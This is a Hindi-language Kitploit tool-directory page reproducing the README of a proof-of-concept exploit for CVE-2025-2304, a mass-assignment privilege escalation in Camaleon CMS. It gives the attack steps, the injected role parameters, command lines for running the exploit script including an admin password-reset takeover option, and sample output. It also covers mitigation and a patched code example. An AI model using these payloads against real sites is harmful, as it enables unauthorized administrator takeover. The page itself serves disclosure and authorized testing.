Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2304-POC — CVE-2025-2304 के लिए अवधारणा का प्रमाण — Camaleon CMS में गंभीर (CVSS 9.4) मास-असाइनमेंट विशेषाधिकार वृद्धि। | Kitploit
उपकरण/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

CVE-2025-2304 के लिए अवधारणा का प्रमाण — Camaleon CMS में गंभीर (CVSS 9.4) मास-असाइनमेंट विशेषाधिकार वृद्धि।

रिपॉजिटरी देखें
1033 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-2304 PoC - Camaleon CMS विशेषाधिकार वृद्धि (Privilege Escalation)

CVE CVSS Python License

CVE-2025-2304 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शोषण, जो Camaleon CMS में एक गंभीर मास असाइनमेंट भेद्यता है, जो निम्न-विशेषाधिकार प्राप्त उपयोगकर्ताओं से प्रशासकों तक विशेषाधिकार वृद्धि की अनुमति देती है।

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 विषयसूची

  • अवलोकन
  • भेद्यता विवरण
  • विशेषताएँ
  • स्थापना
  • उपयोग
  • उदाहरण
  • प्रभावित संस्करण
  • शमन
  • अस्वीकरण
  • संदर्भ
  • लेखक

🔍 अवलोकन

CVE-2025-2304 Camaleon CMS में एक गंभीर मास असाइनमेंट भेद्यता है जो UsersController की updated_ajax विधि में मौजूद है। यह भेद्यता Rails में खतरनाक permit! विधि के उपयोग से उत्पन्न होती है, जो बिना किसी फ़िल्टरिंग के सभी पैरामीटर को पारित करने की अनुमति देती है।

यह PoC प्रदर्शित करता है कि कैसे कम विशेषाधिकारों वाला एक प्रमाणित उपयोगकर्ता पासवर्ड बदलने के संचालन के दौरान अनधिकृत पैरामीटर इंजेक्ट करके प्रशासक भूमिका में वृद्धि कर सकता है।

CVSS स्कोर: 9.4 (गंभीर)

🐛 भेद्यता विवरण

मूल कारण

भेद्य कोड params.require(:user).permit! का उपयोग करता है जो सत्यापन के बिना सभी उपयोगकर्ता-आपूर्ति पैरामीटर को स्वीकार करता है:

root@kitploit:~
def updated_ajax
  user_params = params.require(:user).permit!  # DANGEROUS!
  current_user.update(user_params)
end

शोषण

एक हमलावर वैध पासवर्ड बदलने वाले फ़ील्ड के साथ user[role]=admin जैसे अतिरिक्त पैरामीटर इंजेक्ट कर सकता है, जिससे एप्लिकेशन उपयोगकर्ता की भूमिका को प्रशासक में अपडेट कर देता है।

हमला वेक्टर:

  1. कम विशेषाधिकार वाले उपयोगकर्ता के रूप में प्रमाणित करें (जैसे, "client" भूमिका)
  2. /admin/users/{id}/updated_ajax पर निर्मित POST अनुरोध भेजें
  3. user[role]=admin पैरामीटर इंजेक्ट करें
  4. उपयोगकर्ता भूमिका प्रशासक तक बढ़ जाती है

✨ विशेषताएँ

  • ✅ सुरक्षित परीक्षण: शोषण के दौरान उपयोगकर्ता पासवर्ड संरक्षित रहता है
  • ✅ एकाधिक पेलोड: 7+ विभिन्न इंजेक्शन तकनीकों का परीक्षण करता है
  • ✅ संस्करण पहचान: स्वचालित रूप से भेद्य CMS संस्करणों का पता लगाता है
  • ✅ गैर-विनाशकारी विकल्प: सबसे सुरक्षित परीक्षण के लिए --no-password-field फ़्लैग
  • ✅ प्रॉक्सी समर्थन: मैन्युअल विश्लेषण के लिए Burp Suite/ZAP के साथ एकीकरण
  • ✅ वर्बोज़ मोड: डिबगिंग के लिए विस्तृत आउटपुट
  • ✅ एडमिन टेकओवर: वैकल्पिक एडमिन पासवर्ड रीसेट हमला
  • ✅ रंग-कोडित आउटपुट: सफलता/असफलता के लिए स्पष्ट दृश्य संकेतक

📦 स्थापना

आवश्यकताएँ

  • Python 3.7+
  • pip (पायथन पैकेज मैनेजर)

रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

निर्भरताएँ स्थापित करें

root@kitploit:~
pip install -r requirements.txt

या मैन्युअल रूप से स्थापित करें:

root@kitploit:~
pip install requests beautifulsoup4

🚀 उपयोग

मूल सिंटैक्स

root@kitploit:~
python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

कमांड-लाइन विकल्प

root@kitploit:~
positional arguments:
  target                लक्ष्य URL (जैसे, http://target.com)

required arguments:
  -u, --username        प्रमाणीकरण के लिए मौजूदा उपयोगकर्ता नाम
  -p, --password        उपयोगकर्ता पासवर्ड

optional arguments:
  -h, --help            सहायता संदेश दिखाएँ और बाहर निकलें
  -v, --verbose         विस्तृत आउटपुट (सभी अनुरोध दिखाएँ)
  --proxy PROXY         ट्रैफ़िक निरीक्षण के लिए HTTP प्रॉक्सी (जैसे, http://127.0.0.1:8080)
  --no-password-field   पासवर्ड फ़ील्ड के बिना शोषण का परीक्षण (सबसे सुरक्षित)
  --skip-admin-test     विनाशकारी एडमिन पासवर्ड रीसेट परीक्षण छोड़ें

📚 उदाहरण

मानक परीक्षण (अनुशंसित)

मौजूदा उपयोगकर्ता क्रेडेंशियल के साथ पासवर्ड संरक्षित रखते हुए परीक्षण करें:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

सबसे सुरक्षित परीक्षण (कोई पासवर्ड फ़ील्ड नहीं)

पेलोड में पासवर्ड फ़ील्ड शामिल किए बिना परीक्षण:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

Burp Suite प्रॉक्सी के साथ

मैन्युअल निरीक्षण के लिए Burp Suite के माध्यम से ट्रैफ़िक रूट करें:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

वर्बोज़ मोड

सभी अनुरोधों और प्रतिक्रियाओं को दिखाने वाला विस्तृत आउटपुट सक्षम करें:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

विनाशकारी परीक्षण छोड़ें

केवल विशेषाधिकार वृद्धि का परीक्षण करें, एडमिन पासवर्ड रीसेट छोड़ें:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 नमूना आउटपुट

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS Privilege Escalation PoC
   Mass Assignment Vulnerability Tester
   Author: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] Target: http://target.com
[*] Username: testuser
[*] Password: **********

[*] Logging in as testuser...
[+] Successfully logged in

[*] Checking CMS version...
[*] Detected version: 2.9.0
[+] Version is VULNERABLE (< 2.9.1)

============================================================
[*] Testing CVE-2025-2304 Mass Assignment Vulnerability
============================================================

[*] Target User: testuser (ID: 7)
[*] Current Role: Client (client)
[*] Password will remain unchanged

[1/7] Testing: AJAX endpoint - user[role]
    ✗ Failed
[2/7] Testing: AJAX endpoint - password[role]
============================================================
[+] EXPLOITATION SUCCESSFUL!
============================================================
[+] Privilege Escalation: Client → Administrator
[+] Vulnerable Endpoint: /admin/users/7/updated_ajax
[+] Working Payload: {'password[role]': 'admin'}
[+] Password Unchanged: User can still login normally
[+] CVE-2025-2304 CONFIRMED!

[✓] CVE-2025-2304 VULNERABILITY CONFIRMED

🎯 प्रभावित संस्करण

संस्करणस्थिति
< 2.9.1❌ भेद्य
≥ 2.9.1✅ पैच किया गया

विशेष रूप से भेद्य:

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x और पुराने

🛡️ शमन

तत्काल कार्रवाई

  1. संस्करण 2.9.1 या बाद में अपग्रेड करें

    root@kitploit:~
    gem update camaleon_cms
    
  2. उपयोगकर्ता खातों का ऑडिट करें

    • अप्रत्याशित विशेषाधिकार परिवर्तनों की जाँच करें
    • उपयोगकर्ता भूमिका संशोधन लॉग की समीक्षा करें
    • /users/*/updated_ajax पर संदिग्ध POST अनुरोधों की तलाश करें
  3. पासवर्ड रीसेट करने के लिए बाध्य करें (यदि समझौता हुआ हो)

    • सभी विशेषाधिकार प्राप्त खातों के पासवर्ड रीसेट करें
    • मौजूदा सत्रों को अमान्य करें

दीर्घकालिक रोकथाम

सुरक्षित कोड पैटर्न:

खतरनाक permit! को स्पष्ट व्हाइटलिस्टिंग से बदलें:

root@kitploit:~
# पहले (भेद्य)
def updated_ajax
  user_params = params.require(:user).permit!
  current_user.update(user_params)
end

# बाद में (सुरक्षित)
def updated_ajax
  user_params = params.require(:user).permit(:password, :password_confirmation)
  current_user.update(user_params)
end

अतिरिक्त सुरक्षा उपाय:

  • पूरे एप्लिकेशन में मजबूत पैरामीटर फ़िल्टरिंग लागू करें
  • महत्वपूर्ण संचालन के लिए भूमिका-परिवर्तन स्वीकृति वर्कफ़्लो जोड़ें
  • विशेषाधिकार परिवर्तनों के लिए ऑडिट लॉगिंग सक्षम करें
  • न्यूनतम विशेषाधिकार के सिद्धांत का उपयोग करें
  • WAF नियमों के माध्यम से मास असाइनमेंट प्रयासों की निगरानी करें

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

कानूनी नोटिस:

  • इस उपकरण का उपयोग केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुँच निम्नलिखित कानूनों के तहत अवैध है:
    • संयुक्त राज्य अमेरिका में कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम (CFAA)
    • यूनाइटेड किंगडम में कंप्यूटर दुरुपयोग अधिनियम 1990
    • अन्य न्यायक्षेत्रों में समान विधान
  • लेखक इस उपकरण के दुरुपयोग या क्षति के लिए कोई देयता नहीं मानता
  • उपयोगकर्ता अपने कार्यों के लिए पूरी तरह से जिम्मेदार हैं

नैतिक उपयोग:

  • परीक्षण से पहले उचित प्राधिकरण प्राप्त करें
  • जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
  • अनुमोदित दायरे वाले पैठ परीक्षण आयोजनों में उपयोग करें
  • केवल नियंत्रित प्रयोगशाला वातावरण में शैक्षिक उद्देश्य

📖 संदर्भ

  • CVE प्रविष्टि: CVE-2025-2304
  • GHSA सलाह: GHSA-rp28-mvq3-wf8j
  • विक्रेता सलाह: Tenable Security Research TRA-2025-09
  • पैच कमिट: GitHub Commit 179fd6b
  • रिलीज़ नोट्स: Camaleon CMS 2.9.1

👤 लेखक

d3vn0mi

  • GitHub: @d3vn0mi
  • व्यक्तिगत वेबसाइट: @d3vn0mi
  • व्यक्तिगत ब्लॉग: @d3vn0mi

📝 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

🤝 योगदान

योगदान, मुद्दे और फीचर अनुरोधों का स्वागत है!

कृपया issues पेज देखें।

⭐ अपना समर्थन दिखाएँ

यदि इस प्रोजेक्ट ने आपकी मदद की, तो एक ⭐ दें!


नोट: यह रिपॉजिटरी सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। हमेशा जिम्मेदार प्रकटीकरण का अभ्यास करें और परीक्षण से पहले उचित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें